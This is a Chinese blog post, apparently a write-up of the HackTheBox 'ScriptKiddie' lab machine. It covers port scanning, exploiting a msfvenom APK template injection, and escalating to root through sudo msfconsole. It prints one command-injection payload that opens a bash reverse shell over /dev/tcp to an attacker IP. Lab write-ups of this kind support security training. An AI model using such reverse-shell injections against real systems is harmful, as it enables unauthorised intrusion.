HackTheBox | ScriptKiddie

已于 2022-09-01 22:02:55 修改
阅读量163 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
于 2022-04-22 09:36:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/124337746
版权

ScriptKiddie

nmap扫描,开放22、5000
image-20220419162651422
访问5000端口,页面belike:
image-20220419162858503
根据提示,使用msfvenom APK template command injection反弹shell。

使用msf生成msf.apk
image-20220419163806992
利用生成的msf.apk在目标网站上生成msfvenom木马,其中操作系统类型选Android,lhost设置为127.0.0.1
image-20220419163937989
本地开启监听,随后收到shell。
image-20220419164158222
检查/etc/passwd,发现出了kid这个用户外,还有pwn用户
image-20220419164310924
尝试进入/home/pwn,发现成功进入该目录。
image-20220419164758463
在脚本scanlosers.sh中看到利用了/home/kid/logs/hackers,起到相当于日志的作用,而这个文件权限特殊,属主是kid用户,属组是pwn组。
image-20220419164820016
在scanlosers.sh中执行命令时,使用cut进行了截取,所以写入hackers时需要将执行的反弹shell放在第三个字段。

echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.16.2/1234 0>&1")' > /home/kid/logs/hackers

成功反弹shell。
image-20220419165846772
sudo -l检查,发现可以利用msfconsole提权
image-20220419165923374
sudo打开msfconsole,进入irb模式,反弹shell
image-20220419171255597
image-20220419171316895

1205504)]

[外链图片转存中…(img-McJNA5rM-1650591205504)]

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6290
Hack The Box,一款有意思的渗透测试平台
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 2053
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Pynuke128:我在2020年初制作的一个脚本小子脚本,由于种种原因,我试图隐藏它,以至于我想通过修改就可以破坏这个世界。 哦,我真是天真。 我最尴尬的Forkbomb项目
03-05
Pynuke128:我在2020年初制作的一个脚本小子脚本,由于种种原因,我试图隐藏它,以至于我想通过修改就可以破坏这个世界。 哦,我真是天真。 我最尴尬的Forkbomb项目
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 3881
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
最新发布
2201_75353421的博客
01-30 765
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
手把手教会你--Hack The Box的账号注册(HTB Labs部分)
m0_74317362的博客
11-27 1432
请务必跟着博主复现一遍。
入坑 Hack The Box
LainWith的博客
10-19 9278
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
HackTheBox 如何使用
网络安全学习
04-14 4535
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 3267
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 587
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
ScriptKiddie
T1me
03-07 317
HTB ScriptKiddie 简介 靶机名为脚本小子,os为Linux,难度不高 信息收集 nmap --min-rate 10000 -sV -p- 10.10.10.226 22和5000端口开放,可以看到运行着werkzeug,是一个WSGI工具包,首先查看一下是否存在已知的洞,发现并不适用。直接访问一手。 发现是一个工具库。漏洞就在其中。 漏洞寻找 首先看看nmap,发现时7.8,没什么可以利用的。 Venom看看有没有什么可利用的。 发现存在apk模版注入。 漏洞利用 msf利用起
老实本分——HackTheBox入门
m0_68407377的博客
12-28 650
尽量将VPN接入自己的虚拟机中(kail),不然别人和你使用同一个机器人的时候,会跟你再同一个网段。注意:FULLNAME中间需要一个空格。使用telnet命令来获得flag。账户root,可以不用密码直接进入。页面有指示,可以按照这来。第八个问题获得flag。
Hackthebox(1)系列持续更新
FryhRx的博客
04-14 4644
Hackthebox第一关 文章目录Hackthebox第一关前言一、Hackthebox配置openvpn?配置openvpn二、第0层(简单)终端弄好以后点击产卵机,然后会给你创建一个实例问题 1问题 2问题 3问题 4问题 5问题 6问题 7问题 82.拿flag总结 前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Hackthebox配置openvpn? Hackthebox是国外的一个靶场。 配置
连接hack the box教程
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
hackthebox的网站使用教程
Ba1_Ma0的博客
03-20 1万+
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获取验证码注册教程 网站url:https://blog.csdn.net/qq_45951598/article/details/115269108 然后我们进入网站的首页,这里我们演示的是旧ui,新ui的使用方法与旧的大致相同 使用google浏览器可以自动翻译网站上的英文,右击,然后选择翻译中文

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值